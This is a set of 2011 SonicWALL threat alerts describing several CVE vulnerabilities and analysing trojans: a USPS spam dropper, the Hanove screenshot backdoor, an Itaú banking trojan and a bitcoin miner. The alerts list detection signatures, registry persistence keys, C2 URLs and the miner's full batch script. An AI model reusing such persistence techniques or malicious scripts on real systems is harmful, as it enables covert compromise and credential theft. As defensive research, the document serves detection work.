Oracle Outside In CorelDRAW Integer Overflow (Oct 20, 2011)

Oracle Outside In Technology provides software developers with a comprehensive solution to access, transform, and control the contents of unstructured file formats. The supported formats range from office suites, such as Microsoft Office 2007, to specialty and legacy file formats. The Outside In tool is embedded in multiple client and server products that need to parse various file formats.

CorelDRAW is a vector graphics editor developed and marketed by Corel Corporation. CorelDRAW uses the CDR file format, a proprietary format developed by Corel Corporation and primarily used for vector graphic drawings. Outside In supports Corel Corporation’s CDR file format. The format is encoded in the hierarchical Resource Interchange File Format (RIFF). RIFF is based on the Interchange File Format (IFF), and all multi-byte integers are stored in little-endian byte order. The basic storage structure of RIFF is called a chunk. The format of a chunk is illustrated below:

 Offset  Type     Description
 ------  -------  -----------------------------------------------------------------
 0x0000  Byte[4]  Four ASCII character identifier, padded with space if less than 4
 0x0004  DWORD    Size of Data
 0x0008  Byte[]   Size bytes of data, plus one padding byte if Size is odd

The structure of a CorelDRAW file is not publicly documented. The following structure is the result of reverse engineering the format:

 RIFF ('CDR8' or 'CDR7'
     'vrsn' (version number?)
     'DISP'
     LIST ('INFO'
         'IKEY'
         ...
         )
     LIST ('CMPR' ...)
         LIST ('doc '
             'mcfg'
             'ptrt'
             LIST('stlt'
                 )
             )
         )
     )

An integer overflow vulnerability exists in Oracle Outside In. The vulnerability is due to improper bounds checking of user-supplied chunk data: a value taken from the chunk is used to calculate the size of a memory allocation, and that memory is then filled with user-supplied chunk data. Remote attackers could exploit the vulnerability to inject and execute arbitrary code in the context of the vulnerable service or user application.
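As an added illustration (not Oracle's code and not the actual Outside In routine), the C snippet below shows the arithmetic pattern this bug class shares when an allocation is sized from a RIFF chunk's Size field, beside a checked version that rejects a Size that would wrap or that exceeds the bytes actually present; the chunk bytes are constructed.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not Oracle's code: parse the RIFF chunk header described
 * above (four ASCII bytes, then a little-endian DWORD Size) and size the
 * allocation for it, first in the unchecked form this bug class shares,
 * then in a hardened form that fails closed. */
#define RIFF_HDR_LEN 8u

static uint32_t read_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Unchecked: header length plus attacker-controlled Size is summed in 32
 * bits, so a Size near UINT32_MAX wraps to a tiny allocation while a later
 * copy of Size bytes would run far past it. */
uint32_t unchecked_alloc_len(uint32_t size)
{
    uint32_t pad = size & 1u;          /* one padding byte if Size is odd */
    return RIFF_HDR_LEN + size + pad;  /* silently wraps modulo 2^32 */
}

/* Hardened: returns the allocation length, or -1 when the sum would wrap or
 * when Size claims more payload bytes than the input actually holds. */
long long checked_alloc_len(uint32_t size, size_t avail)
{
    uint32_t pad = size & 1u;
    if (size > UINT32_MAX - RIFF_HDR_LEN - pad) return -1;  /* would wrap */
    if ((uint64_t)size + pad > avail) return -1;            /* truncated */
    return (long long)RIFF_HDR_LEN + size + pad;
}

/* Copies one chunk into a buffer sized by the checked routine.
 * Returns the payload Size, or -1 when the chunk is rejected. */
long long parse_chunk(const uint8_t *buf, size_t len)
{
    if (len < RIFF_HDR_LEN) return -1;
    uint32_t size = read_le32(buf + 4);
    long long total = checked_alloc_len(size, len - RIFF_HDR_LEN);
    if (total < 0) return -1;
    uint8_t *copy = malloc((size_t)total);
    if (copy == NULL) return -1;
    memcpy(copy, buf, RIFF_HDR_LEN + size);  /* in bounds: proven above */
    free(copy);
    return size;
}

/* Constructed sample chunks (not taken from a real CDR file). */
const uint8_t SAMPLE_OK[]    = { 'v','r','s','n', 2,0,0,0, 0x08,0x00 };           /* Size 2 */
const uint8_t SAMPLE_WRAP[]  = { 'v','r','s','n', 0xFC,0xFF,0xFF,0xFF, 0x08,0x00 }; /* Size 0xFFFFFFFC */
const uint8_t SAMPLE_SHORT[] = { 'v','r','s','n', 0x10,0,0,0, 0x08,0x00 };        /* Size 16, 2 present */
```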

SonicWALL UTM team has researched this vulnerability and created the following IPS signature to detect the attack attempts.

  • 2483 Oracle Outside In CorelDRAW File Parser Integer Overflow

This vulnerability is identified by CVE as CVE-2011-3541.

US Postal Service Email Spam (Oct 21, 2011)

SonicWALL UTM Research team received reports of a new spam campaign spreading in the wild that pretends to come from the US Postal Service. It carries a new variant of the Dofoil Trojan, which SonicWALL blocks as GAV: Dofoil.L. The malware also downloads other components, including Trojans and FakeAV software.

The sample e-mail format of the spam campaign includes the following:

Subject:

  • USPS Shipment Status IDxxxxxxxx
  • USPS service. Get your parcel IDxxxxxxxx
  • USPS Invoice copy IDxxxxxxxx
  • USPS Tracking number IDxxxxxxxx

Attachment: Post_Label#id{Random Numbers}.zip

The ZIP file attachment contains the malicious executable, which disguises itself with a Microsoft Word icon as shown below:

    screenshot

Example of the email spam:

    screenshot

If the user downloads and executes the malicious executable inside the zip attachment, it performs the following activities:

  • Creates the process SVCHOST.EXE and injects its code into it.
  • Creates a copy of itself as %application data%\csrss.exe and deletes the original executable file.

Downloads other malware:

  • %windir%\system32\msrepl40A.exe – [ detected as GAV: Swisyn.JYB (Trojan) ]
  • %windir%\system32\wbcache8.exe – [ detected as GAV: Swisyn.JYB (Trojan) ]
  • sl20.exe – [ detected as GAV: EncPk.WX_3 (Trojan) ]
  • setup.exe – [ detected as GAV: Pirminay.ANW (Trojan) ]
  • 574-01.exe – [ detected as GAV: FakeAlert.BHX (Trojan) ]
  • sssss.exe – [ detected as GAV: Danmec.L (Trojan) ]

Added Registry:

  • Key: HKEY_CURRENT_USER\Software\gtwbetugt
  • Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
    Value: Epsilon Squared
    Data: "%Application Data%\csrss.exe"
  • Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
    Value: TKYDMYTE
    Data: "C:\WINDOWS\System32\wbcache8.exe"
  • Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
    Value: Dbft
    Data: "C:\WINDOWS\System32\msrepl40A.exe"

Network Activity:

HTTP GET Requests:

  • http://live{REMOVED}128.ru/m07/index.php
  • http://suteki{REMOVED}disc.jp/walking-diet/
  • http://image{REMOVED}ing.be/

DNS Requests:

  • http://live{REMOVED}128.ru

Hosts File Modification:

The malware adds the following entries to block access to torrent websites:

  • 127.0.0.1 thepiratebay.org
  • 127.0.0.1 www.thepiratebay.org
  • 127.0.0.1 mininova.org
  • 127.0.0.1 www.mininova.org
  • 127.0.0.1 forum.mininova.org
  • 127.0.0.1 blog.mininova.org
  • 127.0.0.1 suprbay.org
  • 127.0.0.1 www.suprbay.org

FakeAV

After installing the FakeAV application, the malware shows a fake Windows error alert as seen below:

    screenshot

    screenshot

    screenshot

Clicking the “Scan and fix” button runs a fake scan for errors and shows a fake result:

    screenshot

Clicking the “Fix Errors” button prompts the user to buy the fake security software.

    screenshot

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Dofoil.L#email (Trojan)
  • GAV: Dofoil.L (Trojan)
  • GAV: Swisyn.JYB (Trojan)
  • GAV: EncPk.WX_3 (Trojan)
  • GAV: FakeAlert.BHX (Trojan)
  • GAV: Danmec.L (Trojan)

Hanove Backdoor Trojan (Oct 27, 2011)

SonicWALL UTM Research team discovered a new backdoor Trojan in the wild. This backdoor Trojan called Hanove opens a backdoor on the infected system allowing the attacker to send further commands to the compromised system. The Trojan was also observed to be capturing and uploading screenshots of the user’s desktop to a remote server at regular intervals.

It performs the following activities:

  • It ensures persistence across reboots by creating the following startup script:
      All Users\Start Menu\Programs\Startup\syncdata.vbs
      screenshot

  • It captures screenshots of the user’s desktop at five-second intervals and stores each one at the following location:
      Documents and Settings\{user}\Desktop\shot.bmp
      screenshot

  • It renames the captured screenshot using the current timestamp, with the following file name format:
      mm-dd-yy_HH-MM-SS.jpg

  • It decrypts obfuscated strings in memory to construct the remote URL it contacts. The decryption routine simply decrements the value of each character by one to obtain the decrypted string.
      screenshot

  • It uploads the captured screenshot to a remote URL using the custom user agent string “MBVDFRESCT”.
      screenshot

  • It receives the following response if the upload is successful:
      screenshot

  • The remote server it connects to is hosted in Pennsylvania, United States, and was active at the time of writing this alert.

SonicWALL Gateway AntiVirus provides protection against this threat with the following signatures:

  • GAV: Hanove.A (Trojan)
  • GAV: Hanove.A_2 (Trojan)

Apple Safari Webkit libxslt File Creation Vulnerability (Oct 27, 2011)

Safari is a web browser developed by Apple Inc. and included with the Mac OS X and iOS operating systems. It supports retrieving, presenting, and traversing information resources such as web pages, images, and video on the World Wide Web. Safari is capable of parsing multiple file formats, including HTML, CSS, XML, JPG, and PIC. Safari is the default web browser for Mac OS X; a simplified version, MobileSafari, runs on Apple iPhone devices. Safari is based on the WebKit rendering engine. WebKit is a development toolkit that allows third-party developers to build applications using technologies such as HTML and JavaScript. WebKit provides the WebCore HTML parser and the JavaScriptCore JavaScript engine.

Extensible Markup Language (XML) is a set of rules for encoding documents in machine-readable form. It is defined in the XML 1.0 Specification produced by the W3C, and several other related specifications. XSLT is a language with an XML-based syntax that is used to transform XML documents into other XML documents, HTML, or other, unstructured formats such as plain text or RTF. For example:

Sample of incoming XML document (the XML markup did not survive in this copy; the element values were):

      John Smith
      Morka Ismincius

XSLT stylesheet provides templates to transform the XML document (the stylesheet did not survive in this copy).

Its evaluation results in a new XML document, having another structure (markup not preserved; the element values were):

      John Morka

WebKit uses the GNOME project’s libxslt library to apply XSLT to XML documents. Libxslt supports multiple extensions to XSLT, including many proposed by the EXSLT extensions initiative and some found in the Saxon XSLT and XQuery processor. An arbitrary file creation vulnerability exists in Safari’s use of the WebKit rendering engine. A remote attacker can exploit this vulnerability to create arbitrary files on the target user’s machine. Remote code execution is possible if the attacker can write a file that will be executed by the host OS.

SonicWALL UTM team has researched this vulnerability and created the following IPS signatures to detect attacks targeting this vulnerability.

  • 2524 Apple Safari Webkit libxslt Arbitrary File Creation 1
  • 2534 Apple Safari Webkit libxslt Arbitrary File Creation 2
  • 7047 Apple Safari Webkit libxslt Arbitrary File Creation Exploit

This vulnerability is identified by CVE as CVE-2011-1774.

Oracle AutoVueX ActiveX Arbitrary File Creation (Nov 3, 2011)

Oracle’s AutoVue enterprise visualization is a suite of Oracle products for viewing, reviewing and collaborating on product, asset and engineering documents and information across remote locations. The AutoVue suite contains an ActiveX control (AutoVueX.ocx) that allows web based interaction with the specified documents.

A file creation vulnerability exists in Oracle’s AutoVueX ActiveX control. Specifically, the vulnerable ActiveX control fails to sanitize parameters in several methods that handle file I/O. A remote attacker can exploit this vulnerability by enticing a user to open a specially crafted webpage. Successful exploitation can result in arbitrary file creation or file overwriting on the file system.

SonicWALL has released multiple IPS signatures to detect and block specific exploitation attempts targeting this vulnerability. The signatures are listed below:

  • 2587 Oracle AutoVueX ActiveX Arbitrary File Creation 1
  • 2849 Oracle AutoVueX ActiveX Arbitrary File Creation 2
  • 2921 Oracle AutoVueX ActiveX Arbitrary File Creation 3

New Banker Trojan redirects credentials to remote server (Nov 3, 2011)

The Sonicwall UTM research team received reports of a new Banking Trojan in the wild. Banking Trojans steal logon credentials and target specific banks. This Banking Trojan targets users of ITAU bank based in Brazil. The Trojan steals bank logon credentials by redirecting traffic through a remote webserver.

The Trojan adds the following files to the filesystem:

  • {run location}\abcde.txt [Detected as GAV: Banker.ITC (Trojan)]
  • C:\Documents and Settings\All Users\Application Data\bola7.txt [Detected as GAV: Banload.QLO_2 (Trojan)]
  • C:\Documents and Settings\All Users\Application Data\clear.exe [Detected as GAV: Banker.SMY_4 (Trojan)]
  • C:\Documents and Settings\All Users\Application Data\crsrc.exe [Detected as GAV: Banker.SMY_5 (Trojan)]
  • C:\Documents and Settings\All Users\Application Data\iexplore.exe [Detected as GAV: Banker.SMY_6 (Trojan)]
  • C:\Documents and Settings\All Users\Application Data\mbservice.exe [Detected as GAV: Banker.SMY_7 (Trojan)]
  • C:\Documents and Settings\All Users\Application Data\h4714log.txt

h4714log.txt contains the following data:

      tipo=inf
      nomepc={USERNAME}
      mac=08-00-27-{removed}

The Trojan adds the following key to the Windows registry to enable startup after reboot:

  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mbservice.exe “C:\Documents and Settings\All Users\Application Data\mbservice.exe”

Upon infection, the Trojan replaces itself with {run location}\abcde.txt and then runs mbservice.exe. mbservice.exe runs in the background inspecting window title strings; it contains code that looks for the specific window title “BANCO ITAU – FEITO PARA VOCE” in Internet Explorer.

The Trojan targets users of ITAU bank. Below is a screenshot of their main page:

The Trojan redirects all traffic through a remote webserver and was observed leaking the following data from h4714log.txt:

The Trojan also leaks data typed into the “Agency” and “Account” boxes and passwords using the virtual keyboard:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Banload.QLO_2 (Trojan)
  • GAV: Banker.SMY_4 (Trojan)
  • GAV: Banker.SMY_5 (Trojan)
  • GAV: Banker.SMY_6 (Trojan)
  • GAV: Banker.SMY_7 (Trojan)

Microsoft Windows TrueType Parsing Engine Code Execution (Nov 3, 2011)

TrueType is an outline font standard originally developed by Apple Computer in the late 1980s as a competitor to Adobe’s Type 1 fonts used in PostScript. TrueType has become the most common format for fonts on both the Mac OS and Microsoft Windows operating systems. In Microsoft Windows, the OS uses a Windows component, the Win32k TrueType font parsing engine to analyze the TTF data.

A remote code execution vulnerability has been found in Microsoft Windows. Specifically, the vulnerability lies in the Win32k TrueType font parsing engine. By exploiting this vulnerability, an attacker could run arbitrary code in kernel mode on the target system. This vulnerability is related to the Duqu malware.

SonicWALL UTM team has researched this vulnerability and released the following GAV signature:

  • 56984 TTF.Exp.MP.1

The vendor, Microsoft, refers to this vulnerability as 2639658, and CVE identifies it as CVE-2011-3402.

Microsoft Security Bulletin Coverage (Nov 8, 2011)

SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of November, 2011. A list of issues reported, along with SonicWALL coverage information follows:

MS11-083 Vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)

  • CVE-2011-2013 Reference Counter Overflow
    Normal traffic is not distinguishable from malicious traffic.

MS11-084 Vulnerability in Windows Kernel-Mode Drivers Could Allow Denial of Service (2617657)

  • CVE-2011-2004 TrueType Font Parsing Vulnerability
    There is no feasible method of detection.

MS11-085 Vulnerability in Windows Mail and Windows Meeting Space Could Allow Remote Code Execution (2620704)

  • CVE-2011-2016 Windows Mail Insecure Library Loading Vulnerability
    IPS: 5726 – Possible Binary Planting Attempt 1

MS11-086 Vulnerability in Active Directory Could Allow Elevation of Privilege (2630837)

  • CVE-2011-2014 LDAPS Authentication Bypass Vulnerability
    Normal traffic is not distinguishable from malicious traffic.

Novell GroupWise vCalendar Processing Vulnerability (Oct 7, 2011)

Novell GroupWise is a messaging and collaborative software platform that supports email, calendaring, personal information management, instant messaging, and document management. The platform consists of the client software, which is available for Windows, Mac OS X, and Linux, and the server software, which is supported on Windows Server, NetWare, and Linux. Novell GroupWise Internet Agent is a component of Novell GroupWise and provides email services, supporting SMTP, POP, and IMAP protocols.

vCalendar is a computer file format which allows Internet users to send meeting requests and tasks to other Internet users, via email, or by sharing files with an extension of .vcs. Events which occur on a regular basis can be identified by the property name RRULE. This property defines a rule or repeating pattern for a recurring vCalendar entity.

A heap-based buffer overflow vulnerability exists in Novell GroupWise Internet Agent. Specifically, the vulnerability occurs while processing RRULE data inside a vCalendar object. An attacker can exploit this vulnerability by sending a crafted vCalendar to the Novell GroupWise server. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the Internet Agent service. Code injection that does not result in execution would terminate the service.

The vulnerability has been assigned CVE-2011-2662.

SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:

  • 6033 Novell GroupWise Internet Agent RRULE Buffer Overflow

New GPU Bitcoin Miner Trojan spotted in the wild (Oct 6, 2011)

The Sonicwall UTM research team received reports of a new Bitcoin Trojan in the wild. Bitcoin is a decentralized peer-to-peer crypto-currency. The process of generating (mining) bitcoins is computationally expensive, and generating a single bitcoin on a personal computer would take an impractical amount of time. If, however, an attacker were able to compromise a handful of machines with fast parallel Graphics Processing Units, mining could become a very lucrative business. CoinMiner.A is a Trojan that attempts to fulfill this purpose.

The Trojan uses the following icon:

The Trojan adds the following files to the filesystem:

  • C:\Documents and Settings\{USER}\Local Settings\Temp\acc\3kal.cmd
  • C:\Documents and Settings\{USER}\Local Settings\Temp\acc\hsbca.exe
  • C:\Documents and Settings\{USER}\Local Settings\Temp\acc\mamatije5.exe [Detected as GAV: CoinMiner.A_2 (Trojan)]
  • C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\wuT2.exe [Detected as GAV: CoinMiner.A_3 (Trojan)]

hsbca.exe is non-malicious software from NTWind called Hidden Start. It is used to run batch files and other programs without a console window. It uses the following icon:

wuT2.exe uses the following icon:

3kal.cmd contains the following data:

      ping -n 40 google.com
      taskkill /f /im cgminer.exe
      taskkill /f /im svchoost.exe
      taskkill /f /im mamatije.exe
      taskkill /f /im mamatije2.exe
      taskkill /f /im mamatije3.exe
      taskkill /f /im yaaa3.2.exe
      taskkill /f /im WinMine.exe
      taskkill /f /im mamatije4.exe
      mamatije5.exe -a 59 -g no -o http://y.b{removed}.info:8332/ -u dxstr_miner -p hello -t 2

The Trojan adds the following keys to the Windows registry:

  • HKEY_CURRENT_USER\Software\WinRAR SFX C:\Documents and Settings\{USER}\Start Menu\Programs\Startup “C:\Documents and Settings\{USER}\Start Menu\Programs\Startup”
  • HKEY_CURRENT_USER\Software\WinRAR SFX C:\Documents and Settings\{USER}\Local Settings\Temp\acc “C:\Documents and Settings\{USER}\Local Settings\Temp\acc”

The Trojan attempts to open the following files:

  • C:\Documents and Settings\{USER}\Start menu\Programs\Startup\start.exe
  • C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\hahahahaha.exe
  • C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\wuT.exe
  • C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\NoRisk.exe
  • C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\NoRisk2.exe

The Trojan uses hsbca.exe (Hidden Start) to run “3kal.cmd” via the following command:

      C:\Documents and Settings\{USER}\Local Settings\Temp\acc\hsbca.exe "/NOCONSOLE C:\Documents and Settings\{USER}\Local Settings\Temp\acc\3kal.cmd"

The Trojan runs the following command to ensure internet connectivity:

  • ping -n 40 google.com

As defined in “3kal.cmd” the Trojan runs taskkill.exe in an attempt to kill the following programs if they are loaded:

  • cgminer.exe
  • svchoost.exe
  • mamatije.exe
  • mamatije2.exe
  • mamatije3.exe
  • yaaa3.2.exe
  • WinMine.exe
  • mamatije4.exe

Our analysis determined that the Trojan uses Nvidia CUDA to employ the GPU (if present) to generate bitcoins:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: CoinMiner.A (Trojan)
  • GAV: CoinMiner.A_2 (Trojan)
  • GAV: CoinMiner.A_3 (Trojan)